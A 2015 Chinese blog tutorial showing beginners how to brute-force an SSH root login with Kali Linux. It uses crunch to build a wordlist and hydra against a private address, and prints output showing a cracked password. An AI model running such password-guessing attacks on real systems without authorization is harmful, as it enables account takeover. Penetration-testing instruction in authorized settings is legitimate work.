kali暴力破解教程

嶺南散人發表於2015-04-05

本文為原創,轉載請註明出處及作者!

kali是滲透工作者的得力兵器,今天帶領初學者怎麼快速實現暴破,所需要的工具都能在kali中找到。不多說了,開始吧~

1.開啟終端,執行命令crunch,這個是字典生成工具,可以根據使用者的要求生成字典。具體引數大家可以看手冊,這裡簡單說一下即可:

crunch 1 4 charset.lst lalpha -o mypwd.txt

上述命令生成最短一個字元最長四個字元的字典,這部字典輸出到mypwd.txt檔案中(所以用了-o 選項),charset.lst lalpha 是說用charset.lst檔案中的lalpha選項,至於是什麼意思,大家可以檢視一下charset.lst這個檔案內容。

2.字典生成好了,下面請出hydra,這個工具的引數也很多,大家可以看手冊,這裡簡單說一下即可:

hydra -l root -w 10 -P pwd.txt -t 14 -v 192.168.1.106 ssh

-l 指定使用者名稱,如果你不確定目標主機是什麼使用者名稱,那可以把所有的使用者名稱放在字典檔案裡,然後用-L user.txt來指定使用者名稱,-w 10是指定不能超過10s ,-P 是指定密碼字典,也就是上一步生成的字典檔案,注意路徑要能找得到哦,-t 是執行緒數,預設是16,-v是顯示破解的過程資訊,最後是目標的ip和協議。

執行後,成功破解了目標主機,如下:

root@su:/usr/share/wordlists# hydra -l root -w 10 -P pwd.txt -t 14 -v 192.168.1.106 ssh
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-04-05 17:09:58
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] 14 tasks, 1 server, 7380 login tries (l:1/p:7380), ~527 tries per task
[DATA] attacking service ssh on port 22
[VERBOSE] Resolving addresses ... done
[ERROR] could not connect to target port 22
[ERROR] ssh protocol error
[ERROR] could not connect to target port 22
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 10
[VERBOSE] Retrying connection for child 12
[22][ssh] host: 192.168.1.106   login: root   password: s
[STATUS] attack finished for 192.168.1.106 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-04-05 17:10:15



                                            2015.清明.suvir

相關文章